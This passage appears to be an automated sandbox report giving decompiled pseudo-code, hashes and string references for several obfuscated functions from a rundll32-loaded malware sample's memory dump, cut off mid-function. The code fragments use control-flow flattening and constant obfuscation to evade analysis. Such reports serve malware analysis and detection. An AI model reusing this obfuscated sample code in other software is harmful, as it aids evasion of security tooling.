0x001bc1b4
0x001bc1bb
0x001bc1c1
0x001bc1cb
0x001bc1d0
0x001bc1d9
0x001bc1e0
0x001bc1e0
0x001bc1bb
0x001bc196
0x001bc181
0x001bc1ec

Strings

D1, xrefs: 001BC023
A , xrefs: 001BC053
?W?, xrefs: 001BBFC3
Jyy/, xrefs: 001BC07B
el, xrefs: 001BC043

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ?W?$A $D1$Jyy/$el
API String ID: 0-1906289488
Opcode ID: a4ebd43d6d87d4b5ee4d3a9c767551fdc5e4a7e78ff46400bc497b3d3d2386db
Instruction ID: 1dd5624b836c6a360f3d235daf99eccf527a14a6b2ae91e6b292c4ee1394a597
Opcode Fuzzy Hash: a4ebd43d6d87d4b5ee4d3a9c767551fdc5e4a7e78ff46400bc497b3d3d2386db
Instruction Fuzzy Hash: E15144715093429FD344DF25D58A50BBBE1FBD8B28F204A1CF4C9A62A0D7B4DA09CF86

Uniqueness

Uniqueness Score: -1.00%

Function 001AC6CE, Relevance: 6.4, Strings: 5, Instructions: 112
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E001AC6CE() {
				char _v520;
				signed int _v524;
				intOrPtr _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				char* _t93;
				void* _t96;
				signed int _t110;
				short* _t113;
				signed int* _t115;

				_t115 =  &_v564;
				_v524 = _v524 & 0x00000000;
				_v528 = 0x75d39b;
				_t96 = 0x2de47e49;
				_v544 = 0xc3e4;
				_v544 = _v544 + 0xffff43da;
				_v544 = _v544 + 0xb1de;
				_v544 = _v544 ^ 0x0000ad22;
				_v548 = 0x726a;
				_v548 = _v548 ^ 0xbf339715;
				_v548 = _v548 + 0xfffff3ec;
				_v548 = _v548 ^ 0xbf33e53d;
				_v532 = 0x22f8;
				_v532 = _v532 ^ 0xac150c49;
				_v532 = _v532 ^ 0xac154c62;
				_v560 = 0xa2e;
				_v560 = _v560 >> 6;
				_v560 = _v560 ^ 0xb5f4e6bd;
				_t110 = 0x2d;
				_v560 = _v560 / _t110;
				_v560 = _v560 ^ 0x040b2a07;
				_v536 = 0x1000;
				_v536 = _v536 * 0x70;
				_v536 = _v536 ^ 0x00072656;
				_v552 = 0x57a1;
				_v552 = _v552 >> 1;
				_v552 = _v552 << 5;
				_v552 = _v552 ^ 0x00056765;
				_v556 = 0xa6ac;
				_v556 = _v556 * 0x57;
				_v556 = _v556 >> 5;
				_v556 = _v556 + 0xffffa03f;
				_v556 = _v556 ^ 0x000147dc;
				_v540 = 0x2ae7;
				_v540 = _v540 << 9;
				_v540 = _v540 ^ 0x0055c5da;
				do {
					while(_t96 != 0xfa0b558) {
						if(_t96 == 0x10833494) {
							return E001AD456(_t113, _v556,  *0x10020724, _v540);
						}
						if(_t96 == 0x246781c5) {
							_t93 = E001AD194(_v544,  &_v520, __eflags, _t96, _v548, _v532);
							_t115 =  &(_t115[3]);
							_t96 = 0xfa0b558;
							continue;
						}
						if(_t96 != 0x2de47e49) {
							goto L15;
						}
						_t96 = 0x246781c5;
					}
					_v564 = 0xbbb9;
					_v564 = _v564 * 0x4e;
					_v564 = _v564 | 0xbfabbbfe;
					_v564 = _v564 ^ 0xbfbbbbfc;
					_t113 =  &_v520 + E001ABBEA(_v560, _v536,  &_v520, _v552) * 2;
					while(1) {
						_t93 =  &_v520;
						__eflags = _t113 - _t93;
						if(_t113 <= _t93) {
							break;
						}
						__eflags =  *_t113 - 0x5c;
						if( *_t113 != 0x5c) {
							L10:
							_t113 = _t113 - 2;
							__eflags = _t113;
							continue;
						}
						_t81 =  &_v564;
						 *_t81 = _v564 - 1;
						__eflags =  *_t81;
						if( *_t81 == 0) {
							__eflags = _t113;
							L14:
							_t96 = 0x10833494;
							goto L15;
						}
						goto L10;
					}
					goto L14;
					L15:
					__eflags = _t96 - 0x87872ef;
				} while (__eflags != 0);
				return _t93;
			}

0x001ac6ce
0x001ac6d4
0x001ac6db
0x001ac6e3
0x001ac6e8
0x001ac6f0
0x001ac6f8
0x001ac700
0x001ac708
0x001ac710
0x001ac718
0x001ac720
0x001ac728
0x001ac730
0x001ac738
0x001ac740
0x001ac748
0x001ac74d
0x001ac75f
0x001ac76c
0x001ac775
0x001ac77d
0x001ac78a
0x001ac78e
0x001ac796
0x001ac79e
0x001ac7a2
0x001ac7a7
0x001ac7af
0x001ac7bc
0x001ac7c0
0x001ac7c5
0x001ac7cd
0x001ac7d5
0x001ac7dd
0x001ac7e2
0x001ac7ee
0x001ac7ee
0x001ac7f4
0x00000000
0x001ac8af
0x001ac7fc
0x001ac81f
0x001ac824
0x001ac827
0x00000000
0x001ac827
0x001ac804
0x00000000
0x00000000
0x001ac80a
0x001ac80a
0x001ac82b
0x001ac838
0x001ac840
0x001ac848
0x001ac868
0x001ac87c
0x001ac87c
0x001ac880
0x001ac882
0x00000000
0x00000000
0x001ac86d
0x001ac871
0x001ac879
0x001ac879
0x001ac879
0x00000000
0x001ac879
0x001ac873
0x001ac873
0x001ac873
0x001ac877
0x001ac886
0x001ac889
0x001ac889
0x00000000
0x001ac889
0x00000000
0x001ac877
0x00000000
0x001ac88b
0x001ac88b
0x001ac88b
0x00000000

Strings

I~-, xrefs: 001AC7FE
*, xrefs: 001AC7D5
., xrefs: 001AC740
I~-, xrefs: 001AC6E3
jr, xrefs: 001AC708

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: .$I~-$I~-$jr$*
API String ID: 0-832335732
Opcode ID: 36efdc9719480c2b5fdc0d2678fd8b143c511906e9324b68b1d3db409affeb04
Instruction ID: e9cd552f98cfd79c546021d301daa89705dbfeb066f808193a610711582a8478
Opcode Fuzzy Hash: 36efdc9719480c2b5fdc0d2678fd8b143c511906e9324b68b1d3db409affeb04
Instruction Fuzzy Hash: 584135765083428BD758DF20D48941FBBE1FBD5398F104A1DF4A6A62A0D3B89A49CFC7

Uniqueness

Uniqueness Score: -1.00%

Function 001B8EE2, Relevance: 6.4, Strings: 5, Instructions: 110
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E001B8EE2(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void* _t82;
				void* _t88;
				void* _t89;
				signed int _t92;
				void* _t95;
				void* _t110;
				signed int* _t113;

				_t109 = _a16;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001AD571(_t82);
				_v76 = 0x6f8b;
				_t113 =  &(( &_v76)[6]);
				_v76 = _v76 + 0x8c5d;
				_v76 = _v76 + 0xffff4872;
				_t110 = 0;
				_v76 = _v76 >> 0xb;
				_t95 = 0x2943c3cf;
				_v76 = _v76 ^ 0x000054fb;
				_v60 = 0xbd2c;
				_t92 = 0x71;
				_v60 = _v60 / _t92;
				_v60 = _v60 + 0x1578;
				_v60 = _v60 ^ 0x00002f47;
				_v68 = 0x8069;
				_v68 = _v68 >> 0xf;
				_v68 = _v68 >> 0xd;
				_v68 = _v68 | 0x74b21309;
				_v68 = _v68 ^ 0x74b275a8;
				_v52 = 0x90f2;
				_v52 = _v52 | 0xe06dbb1a;
				_v52 = _v52 ^ 0xe06d9732;
				_v56 = 0xf7b0;
				_v56 = _v56 + 0x686;
				_v56 = _v56 ^ 0xa4f8427a;
				_v56 = _v56 ^ 0xa4f8a9dc;
				_v72 = 0x7665;
				_v72 = _v72 << 9;
				_v72 = _v72 ^ 0x7725359c;
				_v72 = _v72 | 0xb439d464;
				_v72 = _v72 ^ 0xf7f9d3ee;
				_v48 = 0x725a;
				_v48 = _v48 + 0xffffdb12;
				_v48 = _v48 ^ 0x000074dc;
				_v64 = 0xe8ee;
				_v64 = _v64 * 0x57;
				_v64 = _v64 >> 8;
				_v64 = _v64 + 0xffffd02c;
				_v64 = _v64 ^ 0x000002b2;
				do {
					while(_t95 != 0x1452e728) {
						if(_t95 == 0x247c0811) {
							_t89 = E001B2DA9( &_v44, _v68, _v52, _v56, _t109, _v72);
							_t113 =  &(_t113[4]);
							__eflags = _t89;
							if(__eflags != 0) {
								_t95 = 0x1452e728;
								continue;
							}
						} else {
							if(_t95 == 0x2943c3cf) {
								_t95 = 0x3589722e;
								continue;
							} else {
								if(_t95 != 0x3589722e) {
									goto L10;
								} else {
									E001BC395(_v76,  &_v44, _a12, _v60);
									_t95 = 0x247c0811;
									continue;
								}
							}
						}
						goto L11;
					}
					_t88 = E001A2945( &_v44, _v48, __eflags, _v64, _t109 + 4);
					_t113 =  &(_t113[2]);
					__eflags = _t88;
					_t110 =  !=  ? 1 : _t110;
					_t95 = 0x27322b37;
					L10:
					__eflags = _t95 - 0x27322b37;
				} while (__eflags != 0);
				L11:
				return _t110;
			}

0x001b8ee9
0x001b8eed
0x001b8eee
0x001b8ef2
0x001b8ef6
0x001b8efa
0x001b8efb
0x001b8efc
0x001b8f01
0x001b8f09
0x001b8f0c
0x001b8f16
0x001b8f1e
0x001b8f20
0x001b8f25
0x001b8f2a
0x001b8f37
0x001b8f45
0x001b8f4d
0x001b8f51
0x001b8f59
0x001b8f61
0x001b8f69
0x001b8f6e
0x001b8f73
0x001b8f7b
0x001b8f83
0x001b8f8b
0x001b8f93
0x001b8f9b
0x001b8fa3
0x001b8fab
0x001b8fb3
0x001b8fbb
0x001b8fc3
0x001b8fc8
0x001b8fd0
0x001b8fd8
0x001b8fe0
0x001b8fe8
0x001b8ff0
0x001b8ff8
0x001b9005
0x001b9009
0x001b900e
0x001b9016
0x001b901e
0x001b901e
0x001b9028
0x001b906d
0x001b9072
0x001b9075
0x001b9077
0x001b9079
0x00000000
0x001b9079
0x001b902a
0x001b9030
0x001b9054
0x00000000
0x001b9032
0x001b9034
0x00000000
0x001b9036
0x001b9046
0x001b904d
0x00000000
0x001b904d
0x001b9034
0x001b9030
0x00000000
0x001b9028
0x001b908d
0x001b9094
0x001b9098
0x001b909a
0x001b909d
0x001b90a2
0x001b90a2
0x001b90a2
0x001b90af
0x001b90b7

Strings

7+2', xrefs: 001B90A2
ev, xrefs: 001B8FBB
G/, xrefs: 001B8F59
Zr, xrefs: 001B8FE0
7+2', xrefs: 001B909D

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 7+2'$7+2'$G/$Zr$ev
API String ID: 0-1708381047
Opcode ID: ba62e1fbd3c4daee3adeb0e9ea1ecd3f85333273a657e3fb3952cf645ec6b7d0
Instruction ID: 8f1b1f5ecc8265835417bd0c420cf7d25f316d50b3f00f698724698b3f15d885
Opcode Fuzzy Hash: ba62e1fbd3c4daee3adeb0e9ea1ecd3f85333273a657e3fb3952cf645ec6b7d0
Instruction Fuzzy Hash: A541797110C3429FD718DE21D88945FBBE4BBD8718F104A1DF19AA2260D3B9CA1ADF87

Uniqueness

Uniqueness Score: -1.00%

Function 001AFB05, Relevance: 5.2, Strings: 4, Instructions: 217
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E001AFB05(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				intOrPtr* _t210;
				intOrPtr _t220;
				signed int _t223;
				intOrPtr _t224;
				intOrPtr _t225;
				intOrPtr _t229;
				intOrPtr _t230;
				void* _t246;
				intOrPtr _t247;
				signed int _t248;
				signed int _t249;
				intOrPtr _t250;
				intOrPtr _t252;
				signed int* _t253;
				signed int* _t254;

				_t225 = __ecx;
				_t253 =  &_v112;
				_v12 = 0x2ae831;
				_v8 = 0;
				_v4 = 0;
				_v64 = 0xb890;
				_v36 = 0;
				_t246 = 0x19b194f4;
				_v20 = __edx;
				_t248 = 0x12;
				_v64 = _v64 / _t248;
				_v64 = _v64 ^ 0x00004717;
				_v80 = 0xbfb4;
				_t223 = 0x63;
				_t249 = 0x11;
				_v32 = __ecx;
				_v80 = _v80 * 3;
				_v80 = _v80 + 0xffff4fa6;
				_v80 = _v80 ^ 0x0001d4bc;
				_v84 = 0xf2;
				_v84 = _v84 + 0xffff1f3a;
				_v84 = _v84 ^ 0x439a3d40;
				_v84 = _v84 ^ 0xbc6552f8;
				_v112 = 0x1620;
				_v112 = _v112 ^ 0x171f24f9;
				_v112 = _v112 * 0x49;
				_v112 = _v112 << 5;
				_v112 = _v112 ^ 0xfcaff8c9;
				_v100 = 0x5990;
				_v100 = _v100 << 1;
				_v100 = _v100 >> 2;
				_v100 = _v100 + 0xffff7bb1;
				_v100 = _v100 ^ 0xffff872a;
				_v104 = 0x2c8d;
				_v104 = _v104 + 0xffffbead;
				_v104 = _v104 ^ 0x029e02f7;
				_v104 = _v104 + 0xc7a9;
				_v104 = _v104 ^ 0xfd62d122;
				_v76 = 0x3bec;
				_v76 = _v76 >> 0xe;
				_v76 = _v76 | 0x941fdac1;
				_v76 = _v76 ^ 0x941fd2f4;
				_v108 = 0x835;
				_v108 = _v108 << 0xd;
				_v108 = _v108 >> 0xc;
				_v108 = _v108 * 0xe;
				_v108 = _v108 ^ 0x0000dba4;
				_v52 = 0x4734;
				_v52 = _v52 ^ 0xebb7e2e1;
				_v52 = _v52 ^ 0xebb7b9b6;
				_v56 = 0x478e;
				_v56 = _v56 / _t223;
				_v56 = _v56 ^ 0x000038f6;
				_v60 = 0xd08d;
				_v60 = _v60 | 0x4fe391dd;
				_v60 = _v60 ^ 0x4fe3b3b3;
				_v72 = 0x9241;
				_v72 = _v72 + 0xb8f8;
				_v72 = _v72 / _t249;
				_v72 = _v72 ^ 0x00000500;
				_v92 = 0x37c4;
				_v92 = _v92 ^ 0xd8204144;
				_v92 = _v92 + 0xffff01d4;
				_t252 = _v20;
				_v92 = _v92 / _t223;
				_v92 = _v92 ^ 0x022ea9b2;
				_v96 = 0x66d9;
				_t250 = _v16;
				_t224 = _v20;
				_v96 = _v96 * 0x5f;
				_v96 = _v96 + 0xdd88;
				_v96 = _v96 << 4;
				_v96 = _v96 ^ 0x0270ac9a;
				_v44 = 0xa4f1;
				_v44 = _v44 << 2;
				_v44 = _v44 ^ 0x0002c5b1;
				_v48 = 0xbb1e;
				_v48 = _v48 * 0x4b;
				_v48 = _v48 ^ 0x003681ac;
				_v68 = 0x46e5;
				_v68 = _v68 >> 0xd;
				_v68 = _v68 + 0x5c8f;
				_v68 = _v68 ^ 0x000063c9;
				_v88 = 0x4989;
				_v88 = _v88 + 0xffffd6e3;
				_v88 = _v88 + 0xffff2554;
				_v88 = _v88 * 0x19;
				_v88 = _v88 ^ 0xffeddfa0;
				_t205 = _v40;
				while(_t246 != 0x19b194f4) {
					if(_t246 == 0x29f04624) {
						_t247 = E001B1C0B(_v100,  &_v28, _t205, _t225, _v76, _t252, _v108);
						_t253 =  &(_t253[6]);
						_v36 = _t247;
						if(_t247 == 0) {
							goto L17;
						} else {
							_t229 = _v28;
							if(_t229 == 0) {
								goto L16;
							} else {
								_t205 = _v40 + _t229;
								_v40 = _v40 + _t229;
								_t252 = _t252 - _t229;
								if(_t252 != 0) {
									goto L6;
								} else {
									_t230 = _t250 + _t250;
									_push(_t230);
									_push(_t230);
									_v24 = _t230;
									_t220 = E001B922B(_t230);
									_t254 =  &(_t253[3]);
									_v40 = _t220;
									if(_t220 == 0) {
										goto L16;
									} else {
										E001A5C9F(_v92, _t224, _t250, _t220, _v96);
										E001AE380(_v44, _t224, _v48);
										_t224 = _v40;
										_t252 = _t250;
										_t253 =  &(_t254[4]);
										_t205 = _t224 + _t250;
										_t250 = _v24;
										_v40 = _t205;
										if(_t252 == 0) {
											goto L16;
										} else {
											goto L6;
										}
									}
								}
							}
						}
					} else {
						if(_t246 != 0x2da758ad) {
							L14:
							if(_t246 != 0x1d82698d) {
								continue;
							} else {
								goto L15;
							}
						} else {
							_t250 = 0x10000;
							_push(_t225);
							_push(_t225);
							_t205 = E001B922B(0x10000);
							_t224 = _t205;
							_t253 =  &(_t253[3]);
							if(_t224 == 0) {
								L15:
								_t247 = _v36;
								L16:
								if(_t247 != 0) {
									_t210 = _v20;
									 *_t210 = _t224;
									 *((intOrPtr*)(_t210 + 4)) = _t250 - _t252;
								} else {
									L17:
									E001AE380(_v68, _t224, _v88);
								}
							} else {
								_v40 = _t205;
								_t252 = 0x10000;
								L6:
								_t225 = _v32;
								_t246 = 0x29f04624;
								continue;
							}
						}
					}
					return _t247;
				}
				_t246 = 0x2da758ad;
				goto L14;
			}

0x001afb05
0x001afb05
0x001afb08
0x001afb12
0x001afb16
0x001afb1a
0x001afb26
0x001afb2a
0x001afb33
0x001afb3b
0x001afb40
0x001afb46
0x001afb4e
0x001afb5b
0x001afb5e
0x001afb5f
0x001afb63
0x001afb67
0x001afb6f
0x001afb77
0x001afb7f
0x001afb87
0x001afb8f
0x001afb97
0x001afb9f
0x001afbac
0x001afbb0
0x001afbb5
0x001afbbd
0x001afbc5
0x001afbc9
0x001afbce
0x001afbd6
0x001afbde
0x001afbe6
0x001afbee
0x001afbf6
0x001afbfe
0x001afc06
0x001afc0e
0x001afc13
0x001afc1b
0x001afc23
0x001afc2b
0x001afc30
0x001afc3a
0x001afc3e
0x001afc46
0x001afc4e
0x001afc56
0x001afc5e
0x001afc6e
0x001afc72
0x001afc7a
0x001afc82
0x001afc8a
0x001afc92
0x001afc9a
0x001afca8
0x001afcac
0x001afcb4
0x001afcbc
0x001afcc4
0x001afcd4
0x001afcd8
0x001afcdc
0x001afce4
0x001afcf1
0x001afcf5
0x001afcf9
0x001afcfd
0x001afd05
0x001afd0a
0x001afd12
0x001afd1a
0x001afd1f
0x001afd27
0x001afd34
0x001afd38
0x001afd40
0x001afd48
0x001afd4d
0x001afd55
0x001afd5d
0x001afd65
0x001afd6d
0x001afd7a
0x001afd7e
0x001afd86
0x001afd8a
0x001afd9c
0x001afe02
0x001afe04
0x001afe07
0x001afe0d
0x00000000
0x001afe13
0x001afe13
0x001afe19
0x00000000
0x001afe1f
0x001afe23
0x001afe25
0x001afe29
0x001afe2b
0x00000000
0x001afe2d
0x001afe31
0x001afe40
0x001afe41
0x001afe43
0x001afe47
0x001afe4c
0x001afe4f
0x001afe55
0x00000000
0x001afe57
0x001afe63
0x001afe72
0x001afe77
0x001afe7b
0x001afe7d
0x001afe80
0x001afe83
0x001afe87
0x001afe8d
0x00000000
0x001afe8f
0x00000000
0x001afe8f
0x001afe8d
0x001afe55
0x001afe2b
0x001afe19
0x001afd9e
0x001afda4
0x001afe99
0x001afe9f
0x00000000
0x00000000
0x00000000
0x00000000
0x001afdaa
0x001afdae
0x001afdbf
0x001afdc0
0x001afdc2
0x001afdc7
0x001afdc9
0x001afdce
0x001afea5
0x001afea5
0x001afea9
0x001afeab
0x001afebf
0x001afec5
0x001afec7
0x001afead
0x001afead
0x001afeb7
0x001afebc
0x001afdd4
0x001afdd4
0x001afdd8
0x001afdda
0x001afdda
0x001afdde
0x00000000
0x001afdde
0x001afdce
0x001afda4
0x001afed3
0x001afed3
0x001afe94
0x00000000

Strings

1*, xrefs: 001AFB08
F, xrefs: 001AFD40
;, xrefs: 001AFC06
4G, xrefs: 001AFC46

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 1*$4G$;$F
API String ID: 0-349567369
Opcode ID: 1aeb34c3a1d86a611b1054cc66ce7717dfc773186f88f86bac487a64c95d4c3f
Instruction ID: a5ba5f598f963ba34a39debed613043f00246370e628540c247ba280b9385b57
Opcode Fuzzy Hash: 1aeb34c3a1d86a611b1054cc66ce7717dfc773186f88f86bac487a64c95d4c3f
Instruction Fuzzy Hash: E8A12BB55083418FD354CFA9C58980BFBE1BBC9758F408A2DF59997260D3B5DA0ACF82

Uniqueness

Uniqueness Score: -1.00%

Function 001A8355, Relevance: 5.2, Strings: 4, Instructions: 195
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E001A8355(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				void* _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				void* _t167;
				void* _t190;
				void* _t200;
				signed int _t202;
				signed int _t203;
				signed int _t204;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				void* _t226;
				void* _t227;
				intOrPtr* _t228;
				signed int* _t230;

				_push(_a8);
				_t228 = __edx;
				_t200 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001AD571(_t167);
				_v16 = 0x774bc2;
				_t230 =  &(( &_v84)[4]);
				asm("stosd");
				_t227 = 0x26e9c20b;
				asm("stosd");
				_t202 = 0x6a;
				asm("stosd");
				_v76 = 0x1d07;
				_t226 = 0;
				_v76 = _v76 * 0x3a;
				_v76 = _v76 << 6;
				_v76 = _v76 >> 0xb;
				_v76 = _v76 ^ 0x0000349d;
				_v48 = 0xbd2e;
				_v48 = _v48 / _t202;
				_t203 = 0x5b;
				_v48 = _v48 / _t203;
				_v48 = _v48 ^ 0x00000004;
				_v32 = 0xc05c;
				_t204 = 0x1c;
				_v32 = _v32 * 0x6d;
				_v32 = _v32 ^ 0x0051fdd2;
				_v72 = 0xb846;
				_v72 = _v72 + 0xffff8d9f;
				_v72 = _v72 << 5;
				_v72 = _v72 << 2;
				_v72 = _v72 ^ 0x0022a0d2;
				_v52 = 0xc4f1;
				_v52 = _v52 >> 5;
				_v52 = _v52 >> 0xf;
				_v52 = _v52 ^ 0x00001615;
				_v36 = 0x662;
				_v36 = _v36 / _t204;
				_v36 = _v36 ^ 0x00006bd3;
				_v56 = 0xbdec;
				_v56 = _v56 + 0x52e0;
				_v56 = _v56 | 0xeafe3942;
				_v56 = _v56 ^ 0xeaff29b3;
				_v60 = 0x8f85;
				_v60 = _v60 + 0xfd19;
				_v60 = _v60 << 1;
				_v60 = _v60 ^ 0x00037997;
				_v64 = 0x8933;
				_v64 = _v64 << 1;
				_t205 = 0x57;
				_v64 = _v64 * 0x34;
				_v64 = _v64 ^ 0x0037e990;
				_v80 = 0xc3e3;
				_v80 = _v80 / _t205;
				_t206 = 0x67;
				_v80 = _v80 * 0x11;
				_v80 = _v80 | 0x0e1d22b4;
				_v80 = _v80 ^ 0x0e1d13e6;
				_v84 = 0xf10b;
				_v84 = _v84 + 0x3c11;
				_v84 = _v84 / _t206;
				_t207 = 0x1b;
				_push(3);
				_v84 = _v84 * 0x58;
				_v84 = _v84 ^ 0x0001356c;
				_v40 = 0xe3da;
				_v40 = _v40 >> 0xb;
				_v40 = _v40 | 0xfdebf044;
				_v40 = _v40 ^ 0xfdebe1b0;
				_v44 = 0x3431;
				_v44 = _v44 | 0x0acb9442;
				_v44 = _v44 + 0xa129;
				_v44 = _v44 ^ 0x0acc41a3;
				_v24 = 0xe7fb;
				_v24 = _v24 >> 0xe;
				_v24 = _v24 ^ 0x00004012;
				_v68 = 0x9b1;
				_v68 = _v68 << 3;
				_v68 = _v68 / _t207;
				_v68 = _v68 << 4;
				_v68 = _v68 ^ 0x0000034f;
				_v28 = 0x395b;
				_pop(0);
				_v28 = _v28 / 0;
				_v28 = _v28 ^ 0x00002a55;
				do {
					while(_t227 != 0x964a98b) {
						if(_t227 == 0x10c3db94) {
							_push(0);
							_push(0);
							_t226 = E001B922B(_v20);
							_t230 =  &(_t230[3]);
							if(_t226 != 0) {
								_t227 = 0x161ef5d3;
								continue;
							}
						} else {
							if(_t227 == 0x161ef5d3) {
								E001B138E(_t226, _v40, _v44, 0,  &_v20, _v24, _t200, 0, _v48, _v68, _v28);
								 *_t228 = _v20;
							} else {
								if(_t227 != 0x26e9c20b) {
									goto L11;
								} else {
									_t227 = 0x964a98b;
									continue;
								}
							}
						}
						L14:
						return _t226;
					}
					_t190 = E001B138E(0, _v32, _v72, 0,  &_v20, _v52, _t200, 0, _v76, _v36, _v56);
					_t230 =  &(_t230[0xa]);
					if(_t190 == 0) {
						_t227 = 0x2a29925e;
						goto L11;
					} else {
						_t227 = 0x10c3db94;
						continue;
					}
					goto L14;
					L11:
				} while (_t227 != 0x2a29925e);
				goto L14;
			}

0x001a835c
0x001a8360
0x001a8362
0x001a8364
0x001a8368
0x001a8369
0x001a836a
0x001a836f
0x001a837d
0x001a8380
0x001a8383
0x001a838a
0x001a838b
0x001a838e
0x001a838f
0x001a8397
0x001a839e
0x001a83a2
0x001a83a7
0x001a83ac
0x001a83b4
0x001a83c4
0x001a83cc
0x001a83d1
0x001a83d7
0x001a83dc
0x001a83e9
0x001a83ec
0x001a83f0
0x001a83f8
0x001a8400
0x001a8408
0x001a840d
0x001a8412
0x001a841a
0x001a8422
0x001a8427
0x001a842c
0x001a8434
0x001a8444
0x001a8448
0x001a8450
0x001a8458
0x001a8460
0x001a8468
0x001a8470
0x001a8478
0x001a8480
0x001a8484
0x001a848c
0x001a8494
0x001a849d
0x001a849e
0x001a84a2
0x001a84aa
0x001a84b8
0x001a84c5
0x001a84c8
0x001a84cc
0x001a84d4
0x001a84dc
0x001a84e4
0x001a84f4
0x001a84fd
0x001a84fe
0x001a8500
0x001a8504
0x001a850c
0x001a8514
0x001a8519
0x001a8521
0x001a8529
0x001a8531
0x001a8539
0x001a8541
0x001a8549
0x001a8551
0x001a8556
0x001a855e
0x001a8566
0x001a8573
0x001a8577
0x001a857c
0x001a8584
0x001a8590
0x001a8593
0x001a8597
0x001a859f
0x001a859f
0x001a85ad
0x001a85da
0x001a85db
0x001a85e5
0x001a85e7
0x001a85ec
0x001a85f2
0x00000000
0x001a85f2
0x001a85af
0x001a85b5
0x001a8666
0x001a8672
0x001a85bb
0x001a85c1
0x00000000
0x001a85c3
0x001a85c3
0x00000000
0x001a85c3
0x001a85c1
0x001a85b5
0x001a8675
0x001a867e
0x001a867e
0x001a861b
0x001a8620
0x001a8625
0x001a8631
0x00000000
0x001a8627
0x001a8627
0x00000000
0x001a8627
0x00000000
0x001a8636
0x001a8636
0x00000000

Strings

14, xrefs: 001A8529
U*, xrefs: 001A8597
[9, xrefs: 001A8584
R, xrefs: 001A8458

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 14$U*$[9$R
API String ID: 0-1675214873
Opcode ID: 6949f905ab1da98d861c11ec622d96ca3e1d3e890212ef4e1083f7546a87156b
Instruction ID: 6400ae510f76da8e887798d3f3ee348ef114eba92c245d8890857bc471606060
Opcode Fuzzy Hash: 6949f905ab1da98d861c11ec622d96ca3e1d3e890212ef4e1083f7546a87156b
Instruction Fuzzy Hash: BE8123B1508340AFE319CF25C98A81BFBE1FBC9758F00491DF595962A0D7B6DA498F43

Uniqueness

Uniqueness Score: -1.00%

Function 001A6A6F, Relevance: 5.2, Strings: 4, Instructions: 169
COMMONCrypto

Download Yara Rule

C-Code - Quality: 42%

			E001A6A6F(intOrPtr _a4, intOrPtr _a8) {
				void* _v12;
				intOrPtr _v16;
				char _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				void* __ecx;
